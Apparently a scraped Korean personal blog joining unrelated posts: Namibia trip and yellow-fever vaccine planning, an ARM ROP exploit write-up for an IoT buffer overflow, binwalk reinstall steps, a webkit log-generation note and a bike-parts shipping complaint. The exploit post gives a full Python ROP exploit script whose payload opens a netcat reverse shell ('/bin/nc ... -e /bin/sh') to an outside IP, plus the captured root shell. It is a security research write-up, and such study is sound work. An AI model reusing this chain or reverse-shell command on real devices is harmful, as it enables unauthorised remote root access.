꽃청춘에서 한 루트 나미비아에서 렌트-빅폴에서 반납하는 렌트카는 비용이 어마어마하다. One-Way 금액이 N$13,700=1,096,000원.. ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 빈트후크-빅토리아폭포 공항 항공권은 2명에 50만원.. 결국 우리는 나미비아를 렌트카로 한바퀴 돌고, 빈트후크로 돌아와서 빅토리아 폭포 공항으로 비행기로 이동한 후 빅토리아 폭포를 하루 돌아보고 다시 인천으로 돌아오는 일정을 선택했다.

One-Way를 포기하고 렌트카 따로, 캠핑 용품 따로 빌려주는 곳을 알아보기 시작했다. 그와 동시에, 저 메일에서 알려준 caran@iway.na 에게도 메일을 보냈다. 렌트 기간이 2017.04.30~05.07이고, 나는 4륜 자동차랑 캠핑용품을 같이 렌트하길 바란다. 라고 했더니, 약 3일 뒤 답장이 왔다. 아직 차가 렌트가능한 회사와 연결을 시켜줬다. 렌트카를 예약하기 위해 주고 받은 메일이 약 30통... 으악.. 진짜 미치는 줄 알았다. 특히, 시차 때문인지 아니면 메일이 빠르지 않은 아프리카의 특징 때문인지 한 번 메일을 보내면 약 3일정도 뒤에 답장을 받을 수 있었다.


결과적으로, 나는 8일 렌트에 1번 공항 transfer가 포함되고 보험은 N$35,000까지 보장되는 것을 선택해서, 총 금액 N$8,480 에 렌트카를 예약했다. 한국 금액으로 따지면 약 75만원!

각 회사에 부킹 문의를 했는데 모두 예약 완료라는 대답을 듣는다면, caran@iway.na를 이용하는것이 좋은 방법인것 같다. 연결해준 사이트는 매우 저렴했다. 참고로 내가 예약한 회사는 http://www.savannacarhire.com.na 여기다.


예약은 이런식으로 이루어졌다.

  1. 렌트카 회사에서 예약이 가능한 자동차의 견적서를 보내줌.
  2. 렌트할 차량을 선택해서 메일 답장을 보냄.
  3. 렌트카 회사에서 Booking 폼을 전달해줌.
  4. Booking 폼을 작성해서 답장 전달.
  5. 렌트카 회사에서 총 금액의 25% 디파짓 결제 가능한 링크를 전달해줌.
  6. 링크로 들어가서 내 reference number를 입력하고 결제함
  7. 예약 확정 메일이 옴.


2-2. 숙소 알아보기 & 여행 루트 결정.

하아... 너무 힘들었다. 이것 또한 메일을 통해 진행이 되었는데 메일이 한번 주고 받는데 2-3일은 소요되니 속이 타 죽는줄 알았다. 메일이 오고 바로 답장을 해도 내가 답장을 받는건 2-3일이 걸렸다. 그러니 그냥 속편히 편한 시간에 답장해도 될듯 하다.......

난 숙소를 알아보면서 총 3번 계획을 뒤집었다. ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 1안은 빈트후크->세스림->스와코프문크->에토샤 국립공원->빈트후크 루트였다.



근데 무조건 예약을 완료해야하는 세스리엠 캠핑장에토샤 국립공원 내부 캠핑장 모두 해당 날짜에 예약이 불가능하다고 했다.

그래서 2안을 짰다. 거꾸로 가는!!!!!!! 빈트후크->에토샤->스와코프문크->세스림 루트로 계획을 짜고, 다시 예약을 신청했다.


결과는... 실패ㅠㅠ 예약이 모두 꽉찼다고했다.... 그래서 또 3안을 짰다.. 1안이랑 방향은 같은데, 스와코프문크의 일정을 좀 줄였다.


세스림 캠핑장은 1안과 같았기 때문에, 예약실패라는 것은 알고 있어서 빈트후크에 도착한 후 NWR 사무실에 가서 체크해보고 없으면 그냥 근처에서 묵기로 결정했다.


다행이도 에토샤 국립공원에 있는 2군데에 예약을 성공했다!!! 그래서 최종 스케쥴은 3안으로 결정되었다. 이동거리는 구글 지도를 이용해서 계산했다. ?? 로 되어있는것은 그때 현지에서 이동하는 일정에 맞춰서 그때그때 찾아서 묵기로했다.

모든 일정 짜는 걸 혼자하려니 죽는줄 알았다..ㅠ_ㅠ

에토샤 국립 공원 캠핑장 숙소 예약 과정은 아래와 같았다.

  1. http://www.etoshanationalpark.org/ 에서 Enquire 신청
  2. 예약이 불가능/가능 메일 답변이 옴. 가능일 경우 견적서가 같이 옴.
  3. 가능하고, 견적서 비용을 모두 확인했으면 예약을 하겠다는 메일 답변을 전송함.
  4. invoice와 결제 가능한 링크가 옴.
  5. 결제 가능한 링크로 접속해서 내 invoice 번호를 이용해 전액 결제.
  6. 결제하고 나면 오는 payment reference 번호를 에토샤 예약 담당자에게 메일 전송.
  7. 예약 완료 바우처가 옴.


바우처가 올 때 중요한 내용들도 같이 왔는데 혹시 몰라 남겨본다.

현재 Okaukuejo 캠핑장에는 디젤 연료가 없으니 다른 대체 연료를 찾아와라.

일몰 후에는 공원이 닫으니, 일몰 전에 게이트를 통과해야만 한다. 예상 일몰 시간은 첨부파일에 같이 준다.

어쨌든, 숙소도 예약하고 일정도 짰다. 남은건 예방주사...


빅토리아 폭포!!??

우리는 빈트후크 여행 후 빅토리아 폭포까지는 항공을 이용하기로 했다. 빅토리아 폭포는 잠비아랑 짐바브웨에 걸쳐있는데, 짐바브웨만 볼거면 황열병 주사를 맞지 않아도된다.

그런데!!!! 거기까지 가놓고 한군데서만 보고 오면 후회할 것 같았다. 그래서 황열병 주사를 맞고 두 군데 모두 보기로 결정. 바로 국립 의료원에 예약을 했다.

준비물은 아래와 같았다.

준비물. (각자)

여권 또는 여권 사본
복용약 리스트
간단한 여행 일정
최근 1달 이내 예방접종 내역
은행/우체국에서 전자 수입인지 - 용도: 행정수수료, 금액: 32,460원
진료비 18,700원

나는, 이왕 주사를 맞는 겸 황열병 주사랑 파상풍 주사를 같이 맞고 가려고 한다.

여기까지가 현재(2017.04.07) 준비된 내용이다. 더 추가할 내용이 있으면 바로바로 업데이트할 예정.

+추가(2017.04.12)

큰일났다. 빈트후크->빅토리아 폭포 공항으로 가는 항공편의 스케쥴이 변경되었다고 메일이 왔다.

원래 일정은 5월 7일 10시 35분에 빈트후크 공항에서 출발해서, 13시 10분에 빅토리아 폭포 공항에 도착인데,

5월 7일 13시 15분 출발, 15시 50분 도착으로 변경되었다.아... 빅토리아 폭포를 4시에 도착하면.. 볼수가 없는데ㅠㅠ 망했다...
지금 일정이 꼬여버렸다ㅠㅠㅠㅠㅠㅠㅠ





arm_rop.md

나는 IoT 취약점 진단 업무를 하고 있다. 얼마 전, 한 장비에서 BoF 취약점을 발생하는 것을 확인했다. DEP가 적용되어 있었고, ASLR도 적용되어 있었다. 그래서 익스플로잇이 성공하기 위해선 rop 기법을 적용해야 했고, 성공했다.


본 포스트는 장비에 대한 내용은 모두 제거한, arm rop 제작 내용만을 작성할 예정이다.



1. BoF 확인과 메모리 보호 기법 확인

본 장비의 취약점은 웹으로 전달받은 파라미터를 사이즈 제한 없이 sprintf의 매개변수로 사용해서 발생하였으며, BoF 오프셋 길이는 1293 이었다. DEP와 ASLR이 적용되지 않았다면 스택에 바로 쉘코드를 넣으면 되기 때문에 DEP와 ASLR이 적용되어 있는지 확인하는 작업이 필요하다.

해당 장비는 쉘을 획득할 수 있어서 손쉽게 DEP와 ASLR이 적용되어 있는지 확인할 수 있었다.

 
xxxxxxxxxx
//DEP 확인
root@....:~# cat /proc/프로세스num/maps
(생략)
b6e43000-b6f04000 r-xp 00000000 00:0c 488        /usr/lib/libstdc++.so.6
b6f04000-b6f08000 r--p 000c0000 00:0c 488        /usr/lib/libstdc++.so.6
b6f08000-b6f0a000 rw-p 000c4000 00:0c 488        /usr/lib/libstdc++.so.6
b6f0a000-b6f12000 rw-p 00000000 00:00 0
b6f12000-b6f2b000 r-xp 00000000 00:0c 870        /usr/lib/libqcmap_client.so.1
b6f2b000-b6f2e000 rw-p 00019000 00:0c 870        /usr/lib/libqcmap_client.so.1
b6f2e000-b6f2f000 rw-p 00000000 00:00 0
bef4f000-bef70000 rw-p 00000000 00:00 0          [stack]
befb9000-befba000 r-xp 00000000 00:00 0          [sigpage]
ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]

DEP를 확인하기 위해서는 해당 프로세스의 맵을 확인하면 된다. 현재 [stack]은 bef4f000-bef70000 메모리에 존재하고, execute 권한이 없다. 권한은 r=read, w=write, e=execute 이다.

 
xxxxxxxxxx
//ASLR 확인
root@....:~# sysctl kernel.randomize_va_space
kernel.randomize_va_space = 1

0이면 적용이 되어있지 않은 것이고, 1이면 랜덤 스택 & 랜덤 라이브러리, 2이면 랜덤 스택 & 랜덤 라이브러리 & 랜덤 힙 설정이다. 현재 1이므로, 스택과 라이브러리에 ASLR이 적용 되어있다.



2. payload 작성

스택에 실행 권한이 없고, ASLR이 적용되어 있어서 스택 및 바이너리의 로드 주소가 매번 변경된다. 따라서 rop를 이용해서 아래와 같은 코드를 실행시켜야한다.

 
xxxxxxxxxx
system("/bin/nc 192.168.39.24 999 -e /bin/sh")

arm에서는 함수에 매개변수를 전달할 때 r0~r4 레지스터를 이용한다.

즉, system 함수의 주소로 PC를 이동 시킬 때, r0"/bin/nc 192.168.39.24 999 -e /bin/sh" 문자열의 주소값이 되어 있도록 하면 된다.

방법은 여러 방법이 존재할 수 있다. read 함수랑 write 함수 이용하고 함수 주소를 overwrite하는 방법도 있겠고 나처럼 버퍼에 해당 문자열을 넣고 버퍼의 주소를 계산해서 하는 방법이 있겠다.

맨 처음 생각한 rop 공격 payload의 순서는 아래와 같다.


​ 1) "/bin/nc 192.168.39.24 999 -e /bin/sh" 문자열을 스택에 넣는다. (dummy에 포함)

​ 2) mov r[0-9], sp 명령어를 이용하여 스택의 주소를 특정 레지스터에 넣는다.

​ 3) 1번에서 삽입한 문자열의 주소가 시작되는 오프셋 만큼 레지스터의 값을 뺀다.

​ 4) 계산한 레지스터의 값을 r0의 값으로 설정한다.

​ 5) system 함수를 호출한다.



3. 문제 당면

3-1. system 함수 주소에 null이 있다!!!

system 함수의 주소를 확인하자.

 
xxxxxxxxxx
root@mdm9607:~# gdb --pid 프로세스num
GNU gdb (GDB) 7.8.1
Copyright (C) 2014 Free Software Foundation, Inc.
(생략)
0x49d5a144 in select () from /lib/libc.so.6
(gdb) print system
$1 = {<text variable, no debug info>} 0x49dd8e00 <system>

큰일났다. system 함수의 주소 마지막에 0x00 즉, null 값이 포함되어 있다. 해당 시스템은 arm little endian이라서 0x00이 제일 먼저 들어가기 때문에 사용할 수 없는 주소다.


그럼 system함수 대신에 사용할 수 있는 함수들을 찾아야 한다.

대표적인 예로 exec 계열의 함수 같은 걸 사용할 수 있다. 하지만 exec 계열의 함수들은 인자를 넘겨줄 때 배열로 넘겨줘야 하기 때문에 rop 로 만들어서 사용하기엔 골치가 아프다.

그래서 나는!!!!!!! popen이라는 함수를 사용했다. popen 함수는 파이프 기능을 함수로 사용할 수 있도록 한 것이다.

popen("/bin/nc 192.168.39.24 999 -e /bin/sh","r") 를 호출할 것이다. 즉, popen 주소로 이동하기 전에 r0에는 "/bin/nc 192.168.39.24 999 -e /bin/sh"의 주소값을, r1에는 "r"의 주소값을 넣으면 된다.



3-2. 문자열 뒤에 null을 넣어야한다.

그런데 생각해보자. 문자열의 끝을 알리기 위해서는 0x00 즉, null값이 있어야 한다. 그런데 우리는 웹 파라미터의 값으로 데이터를 전달하기 때문에 null값을 공격할 때 넣으면 그 뒤로는 데이터를 전달 할 수가 없다. 그래서 rop 가젯에서 해당 문자열 맨 뒤에 null값을 넣어주는 루틴도 있어야한다.



4. 최종 payload

문제점을 모두 해결하고 난 후의 payload는 아래와 같다.

​ 1) "/bin/nc 192.168.39.24 999 -e /bin/sh" 문자열을 스택에 넣는다. (dummy에 포함)

​ 2) "r" 문자열을 스택에 넣는다. (dummy에 포함)

​ 3) mov r[0-9], sp 명령어를 이용하여 스택의 주소를 특정 레지스터에 넣는다.

​ 4) 1번에서 삽입한 문자열의 주소가 시작되는 오프셋 만큼 레지스터의 값을 뺀다.

5) 1번 문자열의 길이만큼 레지스터의 값을 더한다.

​ 6) str r[0-9], #0 명령어를 이용하여 해당 주소에 null값을 store 한다.

​ 7) 4번에서 계산한 주소를 r0의 값으로 설정한다.

​ 8) 2번에서 삽입한 문자열의 주소가 시작되는 오프셋 만큼 레지스터의 값을 뺀다.

9) 2번 문자열의 길이만큼 레지스터의 값을 더한다.

​ 10) str r[0-9], #0 명령어를 이용하여 해당 주소에 null값을 store 한다.

​ 11) 8번에서 계산한 주소를 r1의 값으로 설정한다.

​ 12) popen 함수를 호출한다.


5. rop 가젯 만들기

5-1. 가젯으로 사용할 수 있는 리스트 추출

rop 가젯으로 사용하기 위해서는 pc를 원하는 곳으로 옮겨야 하기 때문에 무조건 명령어의 마지막이 brunch 문 또는 pop pc의 명령어가 있어야한다. rop 가젯은 해당 프로그램이 사용하는 기계어들을 이용해야 하기 때문에, 해당 프로세스의 메모리를 재확인한다. 여기서 실행 권한이 있는 코드들은 사용할 수 있다.

 
xxxxxxxxxx
root@....:~# cat /proc/프로세스num/maps
00008000-00024000 r-xp 00000000 00:0c 1296       /usr/bin/....(취약한 바이너리)
00024000-00026000 rw-p 0001c000 00:0c 1296       /usr/bin/....(취약한 바이너리)
00026000-0006b000 rw-p 00000000 00:00 0          [heap]
49c60000-49c80000 r-xp 00000000 00:0c 2138       /lib/ld-linux.so.3
49c87000-49c88000 r--p 0001f000 00:0c 2138       /lib/ld-linux.so.3
49c88000-49c89000 rw-p 00020000 00:0c 2138       /lib/ld-linux.so.3
49c90000-49db8000 r-xp 00000000 00:0c 2163       /lib/libc.so.6
49db8000-49dbf000 ---p 00128000 00:0c 2163       /lib/libc.so.6
49dbf000-49dc1000 r--p 00127000 00:0c 2163       /lib/libc.so.6
49dc1000-49dc3000 rw-p 00129000 00:0c 2163       /lib/libc.so.6
49dc3000-49dc5000 rw-p 00000000 00:00 0
49dc8000-49ddd000 r-xp 00000000 00:0c 2146       /lib/libpthread.so.0
49ddd000-49de4000 ---p 00015000 00:0c 2146       /lib/libpthread.so.0
49de4000-49de5000 r--p 00014000 00:0c 2146       /lib/libpthread.so.0
49de5000-49de6000 rw-p 00015000 00:0c 2146       /lib/libpthread.so.0
(생략)

메모리 확인한 결과, 취약한 바이너리는 주소에 0x00이 들어있기 떄문에 사용 불가능한 바이너리가 되었다. 그리고 나머지 라이브러리 함수들은 사용할 수 있는 주소의 영역에 있다. /lib/ld-linux.so.3 , /lib/libc.so.6, /lib/libpthread.so.0 등의 바이너리를 사용해서 rop 가젯을 만들어야겠다.


/lib/ld-linux.so.3 , /lib/libc.so.6, /lib/libpthread.so.0 외 3개의 바이너리를 kali로 복사하고, ROPgadget.py를 이용하여 해당 바이너리에서 rop 가젯으로 사용할 수 있는 것들을 추출했다.


ROPgadget.py : https://github.com/JonathanSalwan/ROPgadget/


 
xxxxxxxxxx
// ROP 가젯 리스트 생성
root@kali:~/Desktop/ROPgadget-master# ./ROPgadget.py --binary /root/Desktop/ld-linux.so.3 >> /root/Desktop/gadgets.txt
// 생성된 가젯 리스트 확인
Gadgets information
============================================================
(생략)
0x49c70f9c : add sp, sp, #0xc ; bx lr
0x49c70f18 : add sp, sp, #0xc ; pop {lr} ; add sp, sp, #0x10 ; bx lr
0x49c77664 : add sp, sp, #0xc ; pop {r4, r5, pc}
0x49c783cc : add sp, sp, #0xc ; pop {r4, r5, r6, r7, pc}
0x49c6b864 : add sp, sp, #0xc ; pop {r4, r5, r6, r7, r8, sb, pc}
(생략)


5-2. rop payload 가젯 만들기

모든 바이너리에서 추출한 gadgets.txt 파일을 이용하여 4. 최종 payload 에서 작성한 payload를 만들어야한다. 이 과정이 제일 복잡하고 짜증나는 과정이다....ㅠ_ㅠ 나도 해당 payload를 만드는 가젯을 성공적으로 만드는데 까지 약 3일 정도 소요되었다.


BoF 가 일어나는 바로 그 시점의 스택과 레지스터들의 상태는 아래 그림과 같았다.



sp를 맞추기 위해 먼저 2개의 dummy를 넣어주고 시작하였고, 그 이후는 엑셀에 아래와 같이 그려가며 rop 가젯을 맞춰갔다.




6. Exploit script 코드 작성

엑셀로 rop 가젯을 모두 만들고 나서는 Exploit을 수행해 줄 파이썬 스크립트를 작성했다.

 
xxxxxxxxxx
import urllib2, urllib, struct
dummy = "AAAA"
bof_dummy1 = "A"*125
bof_argv2 = "r"
bof_dummy2 = "A"*31
bof_cmd="/bin/nc 192.168.39.24 999 -e /bin/sh"   # 36bit
bof_dummy3 = "A"*1100
bof = bof_dummy1+bof_argv2+bof_dummy2+bof_cmd+bof_dummy3
exploit_data  = struct.pack('<L',0x4a1a070c) #pop {pc} 
exploit_data += dummy*2
exploit_data += struct.pack('<L',0x49d114f8) #mov r0, lr ; pop {r4, pc}
exploit_data += dummy
exploit_data += struct.pack('<L',0x4a1a2e4c) #mov r3, r0 ; mov r2, #0 ; mov r0, r2 ; mov r1, r3 ; bx lr
exploit_data += struct.pack('<L',0x4a1a5048) #mov r2, r3 ; mov r0, r3 ; mov r1, r2 ; pop {r4, r5, r6, r7, pc}
exploit_data += dummy*4
exploit_data += struct.pack('<L',0x49d8d0e4) #mov r1, sp ; blx r2 ; add sp, sp, #0x30 ; pop {r4, pc}
exploit_data += struct.pack('<L',0x49ced27c) #mov r0, r1 ; pop {r4, pc}
exploit_data += dummy
exploit_data += struct.pack('<L',0x49dcf5d8) #sub r0, r0, #0x4c0 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49d0baa0) #add r0, r0, #1 ; pop {r4, r5, pc}
exploit_data += dummy*2
exploit_data += struct.pack('<L',0x49dcf4a4) #mov r3, #0 ; str r3, [r0] ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x4a1a01c0) #sub r0, r0, #1 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x4a1a2e4c) #mov r3, r0 ; mov r2, #0 ; mov r0, r2 ; mov r1, r3 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49d85508) #add r0, r3, #0x20 ; pop {r4, pc}
exploit_data += dummy
exploit_data += struct.pack('<L',0x49d11b64) #add r0, r0, #8 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49d11b64) #add r0, r0, #8 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49d11b64) #add r0, r0, #8 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49d11b64) #add r0, r0, #8 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49d11b54) #add r0, r0, #4 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49dcf4a4) #mov r3, #0 ; str r3, [r0] ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x4a1ab344) #add r0, r1, #8 ; pop {r3, pc}
exploit_data += dummy
exploit_data += struct.pack('<L',0x49d11b64) #add r0, r0, #8 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49d11b64) #add r0, r0, #8 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49d11b64) #add r0, r0, #8 ; bx lr
exploit_data += "A"*0x34
exploit_data += struct.pack('<L',0x49cf0acc) #address of popen
## 이후에는 공격에 필요한 웹 파라미터들이 들어가고, URL Request를 수행함. (생락함)
 
xxxxxxxxxx
# 공격이 성공되어 획득된 쉘
$ nc -lvp 999
listening on [any] 999 ...
connect to [192.168.39.24] from ............. [192.168.39.1] 58575
id
uid=0(root) gid=0(root) groups=0(root)


cd /usr/local/lib/python2.7/dist-packages/

rm -rf binwalk

rm binwalk*


rm /usr/local/bin/binwalk



binwalk 다른 버전 다운로드


tar -xvfz binwalk-2.0.0.tar.gz

cd binwalk-2.0.0

./configure

make

python setup.py install

'임베디드' 카테고리의 다른 글

flashrom 새로운 chip 등록하기  (0) 2018.11.30
ubuntu 에 searchsploit, findsploit 설치하기  (0) 2017.09.01
glibc 버전 확인하기  (0) 2016.03.24
lz4 latency 압축 해제하기  (0) 2015.05.14
linux shadow, passwd  (0) 2015.05.13

교육에 필요한 웹 서버의 정상적인 로그를 쌓기 위해 고민을 하게 되었다.


그냥 Python에서 HTTP Request를 날리면 딱 그 요청 하나만 로그가 쌓인다. 


그런데, 정상적인 브라우저를 통해 접근을 하면 js 파일이라던지, 이미지라던지 등등 한 번 접속으로 많은 로그가 남게된다.


그래서 Python으로 정상적인 브라우저 접속처럼 보이게 하려면 어떻게 해야 하나 많이 고민했다.!!!!



그러다 찾은게 바로 webkit 이라는 모듈!!!!


칼리 리눅스에서는 별다른 설치 없이 사용할 수 있었지만, 윈도우에서는 별도의 설치가 필요한 듯 보인다.



python 을 실행해서 해보니 원하던 대로 잘 된다.







근데!!!!!!!!!!! 잘 되는 걸 파일로 만들어서 하면 안되는거ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ









아마도 연결되기도 전에 파이썬이 끝나서 그런듯 싶다.


해결하기 위해 이곳저곳 다 뒤져봤다ㅠㅠ


그랬더니 QWebView라는 모듈이 있더라고...

그거로 했다...





저기 onDone()에 추후에는 해당 리스폰을 읽어서, href만 뽑고,


랜덤으로 href로 접근할 수 있게 해줄 예정!!


체인리액션 싸이클즈 - http://www.chainreactioncycles.com/kr/en




1번 주문


구매일 - 2016년 4월 10일

선적일 - 2016년 4월 13일

배송 완료일 - ??????? --> 2016년 4월 27일 (오피스텔에 택배 보관함 기록 되어있는걸 찾았다!!)

물건 받은 날....... 2016년 5월 18일.....


배송 - International Post (무료로 보내주는 배송)





2번 주문


구매일 - 2016년 4월 23일

선적일 - 2016년 4월 25일

배송 완료일 - 2016년 5월 2일

물건 받은 날....... 2016년 5월 18일.....


배송 - International Post (무료로 보내주는 배송)로 신청했는데 트래킹 되는 Parcelforce 로 보내줬다.





우선, 체인리액션에서 시킨 첫번째 주문을 언제 받았는지 모르겠다..


하아.. 말하자면 너무 긴데, 선적 되고 보름이 지났는데도 안오는거야!!!!!


그래서 엄청 컴플레인 걸었지... 안 온다. 왜 안오냐 난 아직도 못 받았다!!!! ㅠㅠ 


ㅠㅠㅠㅠㅠ어쩄든, 첫번째 주문의 컴플레인을 엄청 걸던 와중에 두번째 주문을 했지!


근데 이것도 선적되었다고 연락받은 날부터 15일이 넘었는데 안오는거야!!! 화나게!!!!!!!!!!!!!!!!!!


그래서 또 컴플레인을 걸었어. 그랬더니, "이번에 트래킹 되는 거로 보내줬다고, 트래킹 넘버 찍으니까 5월 2일에 배송이 완료되었다고 나온다. 잘 찾아봐라. " 이러는거야. 나 완전 패닉!!!!!


바로 우체국에 전화했지. 이게 무슨일이냐. 5월 2일에 배송이 되었다는데 왜 나는 못받았냐!!! 어케 된거냐!!!


물었더니, 본인 수령했다는거 ㅡㅡ 어이없게!!!!


난 수령한 적이 없다 !! 이랬더니, 그럼 배송 하신 담당자랑 연락해보고 다시 연락을 주겠데.


그러고 나서 연락이 왔는데, 무인 택배함에 넣어놨다는거야ㅡㅡ

아니 무인 택배함에 넣어뒀으면 연락을 해줘야지. 자기 맘데로 거기 넣어놓고 !!!!!!!!!!


내가 그동안 받은 스트레스는 어쩔꺼며 체인리액션에 컴플레인 건건 또 어케하라고!!!!!! ㅠㅜ


아우, 암튼, 무인 택배함 찾아보니 두 번 주문했던 모든게 거기 있더라고 ㅡㅡ 아우 다시 생각해도 짜증나





첫번째 주문은 트래킹도 안되는 배송이었고, 관세 부가도 안되었고!!!! 그러니 내가 거기 있다는걸 알 턱이있나!!!!



아무튼, 첫번째 주문은 언제 도착했는지 미지수기 때문에, 앞으로 Standard 배송을 시킬 때는 심사숙고를 해서 시켜야 할 듯.










  

+ Recent posts